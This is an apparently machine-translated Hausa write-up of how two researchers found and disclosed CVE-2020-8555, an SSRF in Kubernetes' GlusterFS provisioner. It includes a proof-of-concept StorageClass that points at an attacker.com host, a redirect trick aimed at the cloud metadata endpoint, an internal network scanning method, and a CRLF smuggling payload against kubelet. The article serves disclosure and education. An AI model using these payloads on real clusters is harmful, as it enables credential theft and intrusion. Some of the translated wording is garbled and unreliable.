Lokacin da ba kawai game da raunin Kubernetes ba ...

Lura. fassara: Mawallafin wannan labarin sun yi magana dalla-dalla game da yadda suka gudanar da gano raunin CVE-2020-8555 in Kubernetes. Kodayake da farko bai yi kama da haɗari sosai ba, a hade tare da wasu dalilai mahimmancinsa ya zama mafi girma ga wasu masu samar da girgije. Ƙungiyoyi da yawa sun ba da kyauta ga ƙwararrun don aikinsu.

Wanene mu

Mu masu binciken tsaro ne na Faransa guda biyu waɗanda tare suka gano wani rauni a Kubernetes. Sunayen mu Brice Augras da Christophe Hauquiert, amma akan yawancin dandamali na Bug Bounty ana kiran mu da Reeverzax da Hach bi da bi:

• Brice Augras - Kamfanin Groupe Asten;
• Christophe Hauquiert ne adam wata - Kubernetes m a Nokia.

Me ya faru?

Wannan labarin ita ce hanyarmu ta raba yadda aikin bincike na yau da kullun ya juya ba zato ba tsammani ya zama kasada mafi ban sha'awa a rayuwar masu farauta (aƙalla a yanzu).

Kamar yadda ƙila kuka sani, masu farautar kwaro suna da wasu fitattun siffofi guda biyu:

• suna rayuwa akan pizza da giya;
• suna aiki idan kowa yana barci.

Ba mu keɓanta ga waɗannan ƙa'idodin: yawanci muna haɗuwa a ƙarshen mako kuma muna kashe dare marasa barci muna yin kutse. Amma daya daga cikin wadannan dare ya kare a wata hanya da ba a saba gani ba.

Da farko za mu hadu ne don tattaunawa kan shiga CTF rana mai zuwa. A yayin tattaunawa game da tsaro na Kubernetes a cikin yanayin sabis na sarrafawa, mun tuna da tsohuwar ra'ayin SSRF (Neman Jarumin Side-Sabar) kuma ya yanke shawarar gwada amfani da shi azaman rubutun hari.

Karfe 11 na dare muka zauna don yin bincike, muka kwanta da sassafe, mun gamsu da sakamakon. Saboda wannan binciken ne muka ci karo da shirin MSRC Bug Bounty kuma muka fito da wata fa'ida ta haɓaka gata.

Makonni da yawa/watanni sun shuɗe, kuma sakamakonmu na bazata ya haifar da ɗayan mafi girman lada a cikin tarihin Azure Cloud Bug Bounty - ban da wanda muka samu daga Kubernetes!

Dangane da aikin bincikenmu, Kwamitin Tsaro na Samfuran Kubernetes ya buga CVE-2020-8555.

Yanzu ina so in yada bayanai game da raunin da aka samu gwargwadon yiwuwa. Muna fatan ku yaba da gano kuma ku raba bayanan fasaha tare da sauran membobin infosec!

To ga labarinmu...

Ka'ida

Don fahimtar abin da ya faru, bari mu fara duba yadda Kubernetes ke aiki a cikin yanayin sarrafa girgije.

Lokacin da kuke aiwatar da gungu na Kubernetes a cikin irin wannan yanayi, tsarin gudanarwa yawanci alhakin mai samar da girgije ne:

Wurin sarrafawa yana samuwa a kewayen mai samar da girgije, yayin da kubernetes nodes suna cikin kewayen abokin ciniki.

Don rarraba juzu'i mai ƙarfi, ana amfani da injin don samar da su ta atomatik daga bayanan ajiya na waje da kwatanta su da PVC (da'awar ƙarar ƙarar, i.e. buƙatar ƙara).

Don haka, bayan an ƙirƙiri PVC kuma an ɗaure zuwa StorageClass a cikin gungu na K8s, ƙarin ayyuka don samar da ƙarar ana ɗaukar kube/mai sarrafa girgije (daidaitaccen sunansa ya dogara da sakin). (Lura. fassara: Mun riga mun rubuta ƙarin game da CCM ta amfani da misalin aiwatar da shi don ɗaya daga cikin masu samar da girgije a nan.)

Akwai nau'ikan masu samarwa da yawa waɗanda Kubernetes ke goyan bayan: yawancinsu an haɗa su a ciki mawaƙa core, yayin da wasu ana sarrafa su ta ƙarin masu samar da kayan aiki waɗanda aka sanya su a cikin kwasfa a cikin tari.

A cikin bincikenmu, mun mai da hankali kan tsarin samar da ƙarar ciki, wanda aka kwatanta a ƙasa:

Samar da juzu'i masu ƙarfi ta amfani da ginanniyar tanadin Kubernetes

A takaice, lokacin da aka tura Kubernetes a cikin yanayin da ake sarrafawa, mai sarrafa mai sarrafawa shine alhakin mai samar da girgije, amma buƙatar ƙirƙirar ƙara (lamba 3 a cikin zanen da ke sama) ya bar cibiyar sadarwa na ciki na mai samar da girgije. Kuma wannan shi ne inda abubuwa ke da ban sha'awa sosai!

Yanayin Hacking

A cikin wannan sashe, za mu bayyana yadda muka yi amfani da damar aikin da aka ambata a sama kuma mu sami damar samun albarkatun ciki na mai ba da sabis na girgije. Hakanan zai nuna muku yadda zaku iya aiwatar da wasu ayyuka, kamar samun takaddun shaida na ciki ko haɓaka gata.

Yin magudi ɗaya mai sauƙi (a wannan yanayin, Buƙatar Neman Sabis na Sabis) ya taimaka wajen wuce yanayin abokin ciniki zuwa gungu na masu samar da sabis daban-daban a ƙarƙashin K8s.

A cikin bincikenmu mun mayar da hankali kan mai ba da GlusterFS. Duk da cewa an siffanta ƙarin jerin ayyuka a cikin wannan mahallin, Quobyte, StorageOS da ScaleIO suna da rauni ga irin wannan rauni.

Yin amfani da injin samar da ƙara mai ƙarfi

A lokacin nazarin aji na ajiya Farashin GlusterFS a cikin lambar tushen abokin ciniki Golang mu luracewa akan buƙatun HTTP na farko (3) da aka aika yayin ƙirƙirar ƙara, zuwa ƙarshen URL ɗin al'ada a cikin siga resturl an kara /volumes.

Mun yanke shawarar kawar da wannan ƙarin hanyar ta ƙarawa # a cikin siga resturl. Anan shine tsarin YAML na farko da muka yi amfani da shi don gwada raunin SSRF makafi (zaka iya karanta ƙarin game da SSRF makafi ko rabin makafi, misali, a nan - kimanin. fassara):

apiVersion: storage.k8s.io/v1
kind: StorageClass
metadata:
  name: poc-ssrf
provisioner: kubernetes.io/glusterfs
parameters:
  resturl: "http://attacker.com:6666/#"
---
apiVersion: v1
kind: PersistentVolumeClaim
metadata:
  name: poc-ssrf
spec:
  accessModes:
  - ReadWriteOnce
  volumeMode: Filesystem
  resources:
    requests:
      storage: 8Gi
  storageClassName: poc-ssrf

Sannan mun yi amfani da binary don sarrafa gungu na Kubernetes daga nesa kubectl. Yawanci, masu samar da girgije (Azure, Google, AWS, da sauransu) suna ba ku damar samun takaddun shaida don amfani a cikin wannan kayan aiki.

Godiya ga wannan, na sami damar amfani da fayil na "na musamman". Kube-controller-manajan ya aiwatar da buƙatar HTTP da ta haifar:

kubectl create -f sc-poc.yaml

Amsa daga maharin maharin

Ba da daɗewa ba bayan wannan, mun kuma sami damar karɓar martanin HTTP daga sabar da aka yi niyya - ta hanyar umarni describe pvc ko get events in kubectl. Kuma lalle ne: wannan tsohowar direban Kubernetes ya yi yawa a cikin faɗakarwa a cikin gargaɗin sa / saƙonnin kuskure ...

Ga misali mai hanyar haɗi zuwa https://www.google.frsaita azaman siga resturl:

kubectl describe pvc poc-ssrf
# или же можете воспользоваться kubectl get events

A cikin wannan hanyar, an iyakance mu ga tambayoyi kamar HTTP POST kuma ba zai iya samun abinda ke cikin jikin amsa ba idan lambar dawowar ta kasance 201. Saboda haka, mun yanke shawarar gudanar da ƙarin bincike kuma mun faɗaɗa wannan yanayin hacking tare da sababbin hanyoyin.

Juyin binciken mu

• Babban Scenario #1: Yin amfani da turawa 302 daga uwar garken waje don canza hanyar HTTP don samar da mafi sauƙi hanyar tattara bayanan ciki.
• Babban yanayin #2: Mai sarrafa LAN ta atomatik da gano albarkatu na ciki.
• Babban labari #3: ta amfani da HTTP CRLF + fasa-kwaurin ("buƙatar fasa-kwaurin") don ƙirƙirar buƙatun HTTP da aka keɓance da kuma dawo da bayanan da aka ciro daga rajistan ayyukan kube-controller.

Ƙididdiga na Fasaha

• Binciken ya yi amfani da Sabis na Azure Kubernetes (AKS) tare da Kubernetes sigar 1.12 a yankin Arewacin Turai.
• An aiwatar da al'amuran da aka bayyana a sama akan sabbin abubuwan da aka fitar na Kubernetes, ban da labari na uku, saboda yana buƙatar Kubernetes da aka gina tare da sigar Golang ≤ 1.12.
• Sabar na waje na Attacker - https://attacker.com.

Babban yanayin #1: Ana tura buƙatun HTTP POST zuwa SAMU da karɓar bayanai masu mahimmanci

Hanyar asali ta inganta ta hanyar daidaita uwar garken maharin don dawowa 302 HTTP Retcodedon canza buƙatun POST zuwa buƙatar GET (mataki na 4 a cikin zane):

Bukatar farko (3) ta fito daga abokin ciniki Farashin GlusterFS (Mai Gudanarwa), yana da nau'in POST. Ta bin waɗannan matakan mun sami damar mayar da shi zuwa GET:

• A matsayin siga resturl a StorageClass an nuna shi http://attacker.com/redirect.php.
• Endpoint https://attacker.com/redirect.php amsa tare da lambar matsayin HTTP 302 tare da taken Wuri mai zuwa: http://169.254.169.254. Wannan na iya zama duk wani albarkatu na ciki - a wannan yanayin, ana amfani da hanyar haɗin kai kawai azaman misali.
• da default net/http library Golang yana jujjuya buƙatun kuma yana jujjuya POST zuwa GET tare da lambar matsayi 302, yana haifar da buƙatar HTTP GET zuwa tushen manufa.

Don karanta jikin amsa HTTP kuna buƙatar yin describe PVC abu:

kubectl describe pvc xxx

Ga misalin martanin HTTP a tsarin JSON wanda muka sami damar karɓa:

Ƙarfin raunin da aka samu a wancan lokacin ya iyakance saboda abubuwa masu zuwa:

• Rashin iya shigar da rubutun HTTP cikin buƙatun mai fita.
• Rashin iya yin buƙatun POST tare da sigogi a cikin jiki (wannan ya dace don buƙatar ƙimar maɓalli daga misalin da sauransu da ke gudana 2379 tashar jiragen ruwa idan an yi amfani da HTTP mara ɓoye).
• Rashin iya dawo da abun cikin jiki na amsa lokacin da lambar matsayi ta kasance 200 kuma amsar ba ta da nau'in abun ciki na JSON.

Babban labari #2: Ana duba cibiyar sadarwar gida

An yi amfani da wannan hanyar SSRF rabin makafi don bincika hanyar sadarwar cikin gida na mai ba da gajimare da gudanar da zaɓe daban-daban sabis na sauraro (misali Metadata, Kubelet, da sauransu, da sauransu) dangane da martanin da aka bayar. kube controller.

Da farko, an ƙaddara daidaitattun tashoshin sauraren abubuwan abubuwan Kubernetes (8443, 10250, 10251, da sauransu), sannan dole ne mu sarrafa tsarin dubawa.

Ganin cewa wannan hanyar bincika albarkatun ta musamman ce kuma ba ta dace da na'urar daukar hotan takardu da kayan aikin SSRF ba, mun yanke shawarar ƙirƙirar namu ma'aikatan a cikin rubutun bash wanda ke sarrafa gabaɗayan tsari.

Misali, don saurin bincika kewayon 172.16.0.0/12 na cibiyar sadarwar cikin gida, an ƙaddamar da ma'aikata 15 a layi daya. An zaɓi kewayon IP na sama azaman misali kawai kuma maiyuwa ana iya canzawa zuwa kewayon IP na mai bada sabis naka.

Don bincika adireshin IP ɗaya da tashar jiragen ruwa ɗaya, kuna buƙatar yin waɗannan:

• share ma'ajin ajiya na ƙarshe da aka bincika;
• cire da'awar ƙarar ƙarar da aka tabbatar ta baya;
• canza IP da ƙimar Port a ciki sc.yaml;
• ƙirƙirar StorageClass tare da sabon IP da tashar jiragen ruwa;
• ƙirƙirar sabon PVC;
• cire sakamakon binciken ta amfani da siffanta don PVC.

Babban labari #3: allurar CRLF + safarar HTTP a cikin “tsohuwar” nau'ikan tarin Kubernetes

Idan ban da wannan mai bada sabis ya ba abokan ciniki tsoffin juzu'in tarin K8s и ya ba su damar yin amfani da kube-controller-manager's logs, tasirin ya zama mafi mahimmanci.

Lallai ya fi dacewa ga maharin ya canza buƙatun HTTP da aka tsara don samun cikakkiyar amsa ta HTTP bisa ga ra'ayinsa.

Don aiwatar da yanayin ƙarshe, dole ne a cika waɗannan sharuɗɗan:

• Dole ne mai amfani ya sami damar yin amfani da rajistan ayyukan kube-controller-manager (kamar misali, a cikin Azure LogInsights).
• Tarin Kubernetes dole ne yayi amfani da sigar Golang ƙasa da 1.12.

Mun tura wani yanayi na gida wanda ke kwaikwayon sadarwa tsakanin abokin ciniki na GlusterFS Go da sabar manufa ta karya (za mu dena buga PoC a yanzu).

An samu rauni, yana shafar nau'ikan Golang da ke ƙasa da 1.12 da ba da damar masu kutse don aiwatar da hare-haren safarar HTTP/CRLF.

Ta hanyar haɗa SSRF rabin makafi da aka kwatanta a sama вместе tare da wannan, mun sami damar aika buƙatun ga abubuwan da muke so, gami da maye gurbin kanun labarai, hanyar HTTP, sigogi da bayanai, waɗanda kube-controller-manager sannan aka sarrafa su.

Anan akwai misalin “koto” mai aiki a cikin siga resturl StorageClass, wanda ke aiwatar da irin wannan yanayin harin:

http://172.31.X.1:10255/healthz? HTTP/1.1rnConnection: keep-
alivernHost: 172.31.X.1:10255rnContent-Length: 1rnrn1rnGET /pods? HTTP/1.1rnHost: 172.31.X.1:10255rnrn

Sakamakon kuskure ne amsa maras so, saƙo game da wanda aka rubuta a cikin rajistan ayyukan sarrafawa. Godiya ga furucin da aka kunna ta tsohuwa, ana kuma adana abubuwan da ke cikin saƙon amsa HTTP a wurin.

Wannan shine mafi inganci "koto" a cikin tsarin tabbacin ra'ayi.

Yin amfani da wannan hanyar, mun sami damar aiwatar da wasu hare-hare masu zuwa akan gungu na masu samar da k8s daban-daban: haɓaka gata tare da takaddun shaida akan abubuwan metadata, Jagora DoS ta hanyar buƙatun HTTP (ba a ɓoye) akan buƙatun HTTP da dai sauransu.

Sakamakon

A cikin bayanin hukuma Kubernetes game da raunin SSRF da muka gano, an ƙididdige shi CVSS 6.3/10: CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N. Idan muka yi la'akari kawai raunin da ke da alaƙa da kewayen Kubernetes, ƙimar amincin (integrity vector) ya cancanci kamar Babu.

Duk da haka, yin la'akari da sakamakon da zai iya faruwa a cikin mahallin yanayin sabis na sarrafawa (kuma wannan shine mafi ban sha'awa na bincikenmu!) Muhimmin CVSS10/10 ga masu rarrabawa da yawa.

A ƙasa akwai ƙarin bayani don taimaka muku fahimtar abubuwan da muke tunani yayin tantance tasirin tasirin gajimare:

Mutunci

• Aiwatar da umarni daga nesa ta amfani da bayanan sirri da aka samu.
• Maimaita yanayin da ke sama ta amfani da hanyar IDOR (Insecure Direct Object Reference) tare da wasu albarkatun da aka samo akan hanyar sadarwar gida.

Privacy

• Nau'in harin Ƙungiyoyin Yanki godiya ga satar bayanan girgije (misali, API metadata).
• Tattara bayanai ta hanyar bincika cibiyar sadarwar gida (ƙayyade sigar SSH, sigar uwar garken HTTP, ...).
• Tattara misali da bayanan ababen more rayuwa ta hanyar jefa kuri'a na APIs na ciki kamar API na metadata (http://169.254.169.254,…)
• Satar bayanan abokin ciniki ta amfani da bayanan gajimare.

samuwa

Duk abubuwan da suka shafi abubuwan da suka shafi kai hari mutunci, ana iya amfani da shi don ayyuka masu lalata kuma suna haifar da babban misali daga kewayen abokin ciniki (ko wani) kasancewar babu.

Tun da mun kasance a cikin yanayin K8s da aka sarrafa da kuma tantance tasirin kan mutunci, zamu iya tunanin al'amuran da yawa waɗanda zasu iya tasiri ga samuwa. Ƙarin misalan sun haɗa da lalata bayanan da sauransu ko yin kira mai mahimmanci zuwa Kubernetes API.

Lokaci

• Disamba 6, 2019: An ba da rahoton raunin rauni ga MSRC Bug Bounty.
• Janairu 3, 2020: Wani ɓangare na uku ya sanar da masu haɓaka Kubernetes cewa muna aiki kan batun tsaro. Kuma ya umarce su da su ɗauki SSRF a matsayin rauni na ciki (in-core). Daga nan sai muka ba da rahoto na gaba ɗaya tare da cikakkun bayanai game da tushen matsalar.
• Janairu 15, 2020: Mun bayar da rahotanni na fasaha da na gaba ɗaya ga masu haɓaka Kubernetes bisa buƙatar su (ta hanyar dandalin HackerOne).
• Janairu 15, 2020: Masu haɓaka Kubernetes sun sanar da mu cewa allurar SSRF + CRLF rabin makafi don abubuwan da suka gabata ana ɗaukar raunin ciki. Nan da nan mun dakatar da nazarin kewayen sauran masu ba da sabis: ƙungiyar K8s yanzu tana ma'amala da tushen dalilin.
• Janairu 15, 2020: Ladan MSRC da aka samu ta hanyar HackerOne.
• Janairu 16, 2020: Kubernetes PSC (Kwamitin Tsaro na Samfura) ya gane raunin kuma ya nemi a ɓoye shi har zuwa tsakiyar Maris saboda yawan adadin waɗanda abin ya shafa.
• Fabrairu 11, 2020: Google VRP ya karɓi tukuicin.
• Maris 4, 2020: Ladan Kubernetes da aka samu ta hanyar HackerOne.
• Maris 15, 2020: Tun da farko an jinkirta bayyanar da jama'a saboda halin COVID-19.
• Yuni 1, 2020: Kubernetes + Bayanin haɗin gwiwar Microsoft game da raunin.

TL, DR

• Muna shan giya kuma muna cin pizza :)
• Mun gano lahani a cikin Kubernetes, kodayake ba mu da niyyar yin hakan.
• Mun gudanar da ƙarin bincike akan gungu na masu samar da girgije daban-daban kuma mun sami damar haɓaka lalacewa ta hanyar rashin ƙarfi don karɓar ƙarin kari mai ban mamaki.
• Za ku sami cikakkun bayanai na fasaha da yawa a cikin wannan labarin. Za mu yi farin cikin tattauna su da ku (Twitter: @ReeverZax & @__hach_).
• Ya bayyana cewa kowane irin tsari da bayar da rahoto sun ɗauki lokaci mai tsawo fiye da yadda ake tsammani.

nassoshi

• Kungiyar Google kubernetes-sanar da tsaro;
• CVE-2020-8555;
• matsalar #30794;
• heketi/client/api/go-client/volume.go.

PS daga mai fassara

Karanta kuma a kan shafinmu:

• «An buɗe farautar bug Kubernetes bisa hukuma";
• «Fitar da kwasfa a cikin Kubernetes ta hanyar hawan katako";
• «33+ Kubernetes kayan aikin tsaro".

source: www.habr.com